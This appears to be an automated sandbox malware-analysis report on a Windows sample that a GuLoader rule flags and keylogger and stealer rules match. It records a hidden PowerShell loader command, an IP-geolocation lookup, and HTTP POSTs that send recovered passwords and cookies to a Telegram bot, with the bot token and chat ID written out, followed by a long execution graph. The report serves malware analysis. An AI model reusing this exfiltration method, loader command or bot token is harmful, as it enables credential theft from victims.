                                                                                                                                                                    2024-12-24 10:28:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    11192.168.2.949962149.154.167.2204437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:54 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2025/12/2024%20/%2010:58:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-24 10:28:54 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:54 GMT
                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                    2024-12-24 10:28:54 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    12192.168.2.949980149.154.167.2204437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:29:01 UTC342OUTPOST /bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd2558e4eafe83
                                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                    2024-12-24 10:29:01 UTC580OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 35 38 65 34 65 61 66 65 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 74 69 6e 61 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 31 34 31 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 31 32 2f 32 30 32 34 20 2f 20 30 35 3a 32 38 3a 32 34 0d 0a
                                                                                                                                                                    Data Ascii: --------------------------8dd2558e4eafe83Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:114127Date and Time: 24/12/2024 / 05:28:24
                                                                                                                                                                    2024-12-24 10:29:02 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:29:02 GMT
                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                    Content-Length: 520
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                    2024-12-24 10:29:02 UTC520INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 37 39 35 38 33 39 38 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 67 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 61 67 67 6f 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 37 30 30 30 36 32 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 4b 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 50 65 72 65 7a 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 70 65 72 65 7a 79 34 35 35 34 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 30 33 36 31 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                                                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":32,"from":{"id":8179583980,"is_bot":true,"first_name":"Pago","username":"Paggo_Bot"},"chat":{"id":6070006284,"first_name":"KK","last_name":"Perezy","username":"perezy4554","type":"private"},"date":1735036142,"document":{"


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    13192.168.2.949990149.154.167.2204437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:29:05 UTC372OUTPOST /bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd2581d8da2c05
                                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                                    Content-Length: 1277
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-24 10:29:05 UTC1277OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 38 31 64 38 64 61 32 63 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 74 69 6e 61 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 31 34 31 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 31 32 2f 32 30 32 34 20 2f 20
                                                                                                                                                                    Data Ascii: --------------------------8dd2581d8da2c05Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:114127Date and Time: 24/12/2024 /
                                                                                                                                                                    2024-12-24 10:29:06 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:29:05 GMT
                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                    Content-Length: 531
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                    2024-12-24 10:29:06 UTC531INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 37 39 35 38 33 39 38 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 67 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 61 67 67 6f 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 37 30 30 30 36 32 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 4b 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 50 65 72 65 7a 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 70 65 72 65 7a 79 34 35 35 34 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 30 33 36 31 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                                                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":33,"from":{"id":8179583980,"is_bot":true,"first_name":"Pago","username":"Paggo_Bot"},"chat":{"id":6070006284,"first_name":"KK","last_name":"Perezy","username":"perezy4554","type":"private"},"date":1735036145,"document":{"


                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:05:27:04
                                                                                                                                                                    Start date:24/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\Technonomic.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Technonomic.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:777'472 bytes
                                                                                                                                                                    MD5 hash:C174A412BE6F74C3323AE8D6D4737086
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:05:27:05
                                                                                                                                                                    Start date:24/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "
                                                                                                                                                                    Imagebase:0xcc0000
                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:05:27:05
                                                                                                                                                                    Start date:24/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff70f010000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:05:28:08
                                                                                                                                                                    Start date:24/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                                    Imagebase:0x660000
                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2620412422.00000000258F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2598654434.000000000651E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:23.7%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:21.4%
                                                                                                                                                                      Total number of Nodes:1357
                                                                                                                                                                      Total number of Limit Nodes:45
                                                                                                                                                                      execution_graph 4024 402840 4025 402bbf 18 API calls 4024->4025 4027 40284e 4025->4027 4026 402864 4029 405d33 2 API calls 4026->4029 4027->4026 4028 402bbf 18 API calls 4027->4028 4028->4026 4030 40286a 4029->4030 4052 405d58 GetFileAttributesW CreateFileW 4030->4052 4032 402877 4033 402883 GlobalAlloc 4032->4033 4034 40291a 4032->4034 4037 402911 CloseHandle 4033->4037 4038 40289c 4033->4038 4035 402922 DeleteFileW 4034->4035 4036 402935 4034->4036 4035->4036 4037->4034 4053 40336e SetFilePointer 4038->4053 4040 4028a2 4041 403358 ReadFile 4040->4041 4042 4028ab GlobalAlloc 4041->4042 4043 4028bb 4042->4043 4044 4028ef 4042->4044 4045 4030e7 45 API calls 4043->4045 4046 405e0a WriteFile 4044->4046 4047 4028c8 4045->4047 4048 4028fb GlobalFree 4046->4048 4050 4028e6 GlobalFree 4047->4050 4049 4030e7 45 API calls 4048->4049 4051 40290e 4049->4051 4050->4044 4051->4037 4052->4032 4053->4040 4054 401cc0 4055 402ba2 18 API calls 4054->4055 4056 401cc7 4055->4056 4057 402ba2 18 API calls 4056->4057 4058 401ccf GetDlgItem 4057->4058 4059 402531 4058->4059 4060 4029c0 4061 402ba2 18 API calls 4060->4061 4062 4029c6 4061->4062 4063 40281e 4062->4063 4064 4029f9 4062->4064 4066 4029d4 4062->4066 4064->4063 4065 4061a5 18 API calls 4064->4065 4065->4063 4066->4063 4068 4060ca wsprintfW 4066->4068 4068->4063 3238 401fc3 3239 401fd5 3238->3239 3240 402087 3238->3240 3258 402bbf 3239->3258 3242 401423 25 API calls 3240->3242 3248 4021e1 3242->3248 3244 402bbf 18 API calls 3245 401fe5 3244->3245 3246 401ffb LoadLibraryExW 3245->3246 3247 401fed GetModuleHandleW 3245->3247 3246->3240 3249 40200c 3246->3249 3247->3246 3247->3249 3264 4065c8 WideCharToMultiByte 3249->3264 3252 402056 3254 4052e2 25 API calls 3252->3254 3253 40201d 3256 40202d 3253->3256 3267 401423 3253->3267 3254->3256 3256->3248 3257 402079 FreeLibrary 3256->3257 3257->3248 3259 402bcb 3258->3259 3260 4061a5 18 API calls 3259->3260 3261 402bec 3260->3261 3262 401fdc 3261->3262 3263 406417 5 API calls 3261->3263 3262->3244 3263->3262 3265 4065f2 GetProcAddress 3264->3265 3266 402017 3264->3266 3265->3266 3266->3252 3266->3253 3268 4052e2 25 API calls 3267->3268 3269 401431 3268->3269 3269->3256 4069 4016c4 4070 402bbf 18 API calls 4069->4070 4071 4016ca GetFullPathNameW 4070->4071 4074 4016e4 4071->4074 4078 401706 4071->4078 4072 40171b GetShortPathNameW 4073 402a4c 4072->4073 4075 4064c6 2 API calls 4074->4075 4074->4078 4076 4016f6 4075->4076 4076->4078 4079 406183 lstrcpynW 4076->4079 4078->4072 4078->4073 4079->4078 4080 406847 4084 4066cb 4080->4084 4081 407036 4082 406755 GlobalAlloc 4082->4081 4082->4084 4083 40674c GlobalFree 4083->4082 4084->4081 4084->4082 4084->4083 4084->4084 4085 4067c3 GlobalFree 4084->4085 4086 4067cc GlobalAlloc 4084->4086 4085->4086 4086->4081 4086->4084 3454 4014cb 3455 4052e2 25 API calls 3454->3455 3456 4014d2 3455->3456 4087 40194e 4088 402bbf 18 API calls 4087->4088 4089 401955 lstrlenW 4088->4089 4090 402531 4089->4090 4091 4027ce 4092 4027d6 4091->4092 4093 4027da FindNextFileW 4092->4093 4095 4027ec 4092->4095 4094 402833 4093->4094 4093->4095 4097 406183 lstrcpynW 4094->4097 4097->4095 3533 401754 3534 402bbf 18 API calls 3533->3534 3535 40175b 3534->3535 3539 405d87 3535->3539 3537 401762 3538 405d87 2 API calls 3537->3538 3538->3537 3540 405d94 GetTickCount GetTempFileNameW 3539->3540 3541 405dce 3540->3541 3542 405dca 3540->3542 3541->3537 3542->3540 3542->3541 4105 405256 4106 405266 4105->4106 4107 40527a 4105->4107 4108 4052c3 4106->4108 4109 40526c 4106->4109 4110 405282 IsWindowVisible 4107->4110 4116 405299 4107->4116 4111 4052c8 CallWindowProcW 4108->4111 4112 404293 SendMessageW 4109->4112 4110->4108 4113 40528f 4110->4113 4114 405276 4111->4114 4112->4114 4118 404bac SendMessageW 4113->4118 4116->4111 4123 404c2c 4116->4123 4119 404c0b SendMessageW 4118->4119 4120 404bcf GetMessagePos ScreenToClient SendMessageW 4118->4120 4121 404c03 4119->4121 4120->4121 4122 404c08 4120->4122 4121->4116 4122->4119 4132 406183 lstrcpynW 4123->4132 4125 404c3f 4133 4060ca wsprintfW 4125->4133 4127 404c49 4128 40140b 2 API calls 4127->4128 4129 404c52 4128->4129 4134 406183 lstrcpynW 4129->4134 4131 404c59 4131->4108 4132->4125 4133->4127 4134->4131 4135 401d56 GetDC GetDeviceCaps 4136 402ba2 18 API calls 4135->4136 4137 401d74 MulDiv ReleaseDC 4136->4137 4138 402ba2 18 API calls 4137->4138 4139 401d93 4138->4139 4140 4061a5 18 API calls 4139->4140 4141 401dcc CreateFontIndirectW 4140->4141 4142 402531 4141->4142 4143 401a57 4144 402ba2 18 API calls 4143->4144 4145 401a5d 4144->4145 4146 402ba2 18 API calls 4145->4146 4147 401a05 4146->4147 4148 4014d7 4149 402ba2 18 API calls 4148->4149 4150 4014dd Sleep 4149->4150 4152 402a4c 4150->4152 4153 40435b lstrcpynW lstrlenW 4154 40155b 4155 4029f2 4154->4155 4158 4060ca wsprintfW 4155->4158 4157 4029f7 4158->4157 3972 401ddc 3973 402ba2 18 API calls 3972->3973 3974 401de2 3973->3974 3975 402ba2 18 API calls 3974->3975 3976 401deb 3975->3976 3977 401df2 ShowWindow 3976->3977 3978 401dfd EnableWindow 3976->3978 3979 402a4c 3977->3979 3978->3979 4159 404c5e GetDlgItem GetDlgItem 4160 404cb0 7 API calls 4159->4160 4168 404ec9 4159->4168 4161 404d53 DeleteObject 4160->4161 4162 404d46 SendMessageW 4160->4162 4163 404d5c 4161->4163 4162->4161 4165 404d93 4163->4165 4167 4061a5 18 API calls 4163->4167 4164 404fad 4166 405059 4164->4166 4175 405006 SendMessageW 4164->4175 4202 404ebc 4164->4202 4169 404247 19 API calls 4165->4169 4171 405063 SendMessageW 4166->4171 4172 40506b 4166->4172 4173 404d75 SendMessageW SendMessageW 4167->4173 4168->4164 4170 404f3a 4168->4170 4179 404bac 5 API calls 4168->4179 4174 404da7 4169->4174 4170->4164 4177 404f9f SendMessageW 4170->4177 4171->4172 4178 405094 4172->4178 4185 405084 4172->4185 4186 40507d ImageList_Destroy 4172->4186 4173->4163 4180 404247 19 API calls 4174->4180 4183 40501b SendMessageW 4175->4183 4175->4202 4176 4042ae 8 API calls 4184 40524f 4176->4184 4177->4164 4182 405203 4178->4182 4201 404c2c 4 API calls 4178->4201 4206 4050cf 4178->4206 4179->4170 4181 404db5 4180->4181 4187 404e8a GetWindowLongW SetWindowLongW 4181->4187 4195 404e05 SendMessageW 4181->4195 4197 404e84 4181->4197 4199 404e41 SendMessageW 4181->4199 4200 404e52 SendMessageW 4181->4200 4190 405215 ShowWindow GetDlgItem ShowWindow 4182->4190 4182->4202 4189 40502e 4183->4189 4185->4178 4188 40508d GlobalFree 4185->4188 4186->4185 4191 404ea3 4187->4191 4188->4178 4196 40503f SendMessageW 4189->4196 4190->4202 4192 404ec1 4191->4192 4193 404ea9 ShowWindow 4191->4193 4211 40427c SendMessageW 4192->4211 4210 40427c SendMessageW 4193->4210 4195->4181 4196->4166 4197->4187 4197->4191 4199->4181 4200->4181 4201->4206 4202->4176 4203 4051d9 InvalidateRect 4203->4182 4204 4051ef 4203->4204 4212 404b67 4204->4212 4205 4050fd SendMessageW 4209 405113 4205->4209 4206->4205 4206->4209 4208 405187 SendMessageW SendMessageW 4208->4209 4209->4203 4209->4208 4210->4202 4211->4168 4215 404a9e 4212->4215 4214 404b7c 4214->4182 4216 404ab7 4215->4216 4217 4061a5 18 API calls 4216->4217 4218 404b1b 4217->4218 4219 4061a5 18 API calls 4218->4219 4220 404b26 4219->4220 4221 4061a5 18 API calls 4220->4221 4222 404b3c lstrlenW wsprintfW SetDlgItemTextW 4221->4222 4222->4214 4223 401bdf 4224 402ba2 18 API calls 4223->4224 4225 401be6 4224->4225 4226 402ba2 18 API calls 4225->4226 4227 401bf0 4226->4227 4229 401c00 4227->4229 4230 402bbf 18 API calls 4227->4230 4228 401c10 4232 401c1b 4228->4232 4233 401c5f 4228->4233 4229->4228 4231 402bbf 18 API calls 4229->4231 4230->4229 4231->4228 4234 402ba2 18 API calls 4232->4234 4235 402bbf 18 API calls 4233->4235 4236 401c20 4234->4236 4237 401c64 4235->4237 4238 402ba2 18 API calls 4236->4238 4239 402bbf 18 API calls 4237->4239 4241 401c29 4238->4241 4240 401c6d FindWindowExW 4239->4240 4244 401c8f 4240->4244 4242 401c31 SendMessageTimeoutW 4241->4242 4243 401c4f SendMessageW 4241->4243 4242->4244 4243->4244 4245 4022df 4246 402bbf 18 API calls 4245->4246 4247 4022ee 4246->4247 4248 402bbf 18 API calls 4247->4248 4249 4022f7 4248->4249 4250 402bbf 18 API calls 4249->4250 4251 402301 GetPrivateProfileStringW 4250->4251 4252 401960 4253 402ba2 18 API calls 4252->4253 4254 401967 4253->4254 4255 402ba2 18 API calls 4254->4255 4256 401971 4255->4256 4257 402bbf 18 API calls 4256->4257 4258 40197a 4257->4258 4259 40198e lstrlenW 4258->4259 4260 4019ca 4258->4260 4261 401998 4259->4261 4261->4260 4265 406183 lstrcpynW 4261->4265 4263 4019b3 4263->4260 4264 4019c0 lstrlenW 4263->4264 4264->4260 4265->4263 4266 401662 4267 402bbf 18 API calls 4266->4267 4268 401668 4267->4268 4269 4064c6 2 API calls 4268->4269 4270 40166e 4269->4270 4271 4046e2 4272 40470e 4271->4272 4273 40471f 4271->4273 4332 4058ac GetDlgItemTextW 4272->4332 4275 40472b GetDlgItem 4273->4275 4276 40478a 4273->4276 4278 40473f 4275->4278 4283 4061a5 18 API calls 4276->4283 4293 40486e 4276->4293 4330 404a1d 4276->4330 4277 404719 4279 406417 5 API calls 4277->4279 4281 404753 SetWindowTextW 4278->4281 4282 405be2 4 API calls 4278->4282 4279->4273 4285 404247 19 API calls 4281->4285 4287 404749 4282->4287 4288 4047fe SHBrowseForFolderW 4283->4288 4284 40489e 4289 405c3f 18 API calls 4284->4289 4290 40476f 4285->4290 4286 4042ae 8 API calls 4291 404a31 4286->4291 4287->4281 4296 405b37 3 API calls 4287->4296 4292 404816 CoTaskMemFree 4288->4292 4288->4293 4294 4048a4 4289->4294 4295 404247 19 API calls 4290->4295 4297 405b37 3 API calls 4292->4297 4293->4330 4334 4058ac GetDlgItemTextW 4293->4334 4335 406183 lstrcpynW 4294->4335 4298 40477d 4295->4298 4296->4281 4299 404823 4297->4299 4333 40427c SendMessageW 4298->4333 4302 40485a SetDlgItemTextW 4299->4302 4307 4061a5 18 API calls 4299->4307 4302->4293 4303 404783 4305 406559 5 API calls 4303->4305 4304 4048bb 4306 406559 5 API calls 4304->4306 4305->4276 4313 4048c2 4306->4313 4308 404842 lstrcmpiW 4307->4308 4308->4302 4311 404853 lstrcatW 4308->4311 4309 404903 4336 406183 lstrcpynW 4309->4336 4311->4302 4312 40490a 4314 405be2 4 API calls 4312->4314 4313->4309 4317 405b83 2 API calls 4313->4317 4319 40495b 4313->4319 4315 404910 GetDiskFreeSpaceW 4314->4315 4318 404934 MulDiv 4315->4318 4315->4319 4317->4313 4318->4319 4320 4049cc 4319->4320 4322 404b67 21 API calls 4319->4322 4321 4049ef 4320->4321 4323 40140b 2 API calls 4320->4323 4337 404269 KiUserCallbackDispatcher 4321->4337 4324 4049b9 4322->4324 4323->4321 4326 4049ce SetDlgItemTextW 4324->4326 4327 4049be 4324->4327 4326->4320 4329 404a9e 21 API calls 4327->4329 4328 404a0b 4328->4330 4338 404677 4328->4338 4329->4320 4330->4286 4332->4277 4333->4303 4334->4284 4335->4304 4336->4312 4337->4328 4339 404685 4338->4339 4340 40468a SendMessageW 4338->4340 4339->4340 4340->4330 4341 4043e4 4342 4043fc 4341->4342 4346 404516 4341->4346 4347 404247 19 API calls 4342->4347 4343 404580 4344 404652 4343->4344 4345 40458a GetDlgItem 4343->4345 4352 4042ae 8 API calls 4344->4352 4348 404613 4345->4348 4349 4045a4 4345->4349 4346->4343 4346->4344 4350 404551 GetDlgItem SendMessageW 4346->4350 4351 404463 4347->4351 4348->4344 4353 404625 4348->4353 4349->4348 4356 4045ca 6 API calls 4349->4356 4372 404269 KiUserCallbackDispatcher 4350->4372 4355 404247 19 API calls 4351->4355 4362 40464d 4352->4362 4357 40463b 4353->4357 4358 40462b SendMessageW 4353->4358 4360 404470 CheckDlgButton 4355->4360 4356->4348 4361 404641 SendMessageW 4357->4361 4357->4362 4358->4357 4359 40457b 4363 404677 SendMessageW 4359->4363 4370 404269 KiUserCallbackDispatcher 4360->4370 4361->4362 4363->4343 4365 40448e GetDlgItem 4371 40427c SendMessageW 4365->4371 4367 4044a4 SendMessageW 4368 4044c1 GetSysColor 4367->4368 4369 4044ca SendMessageW 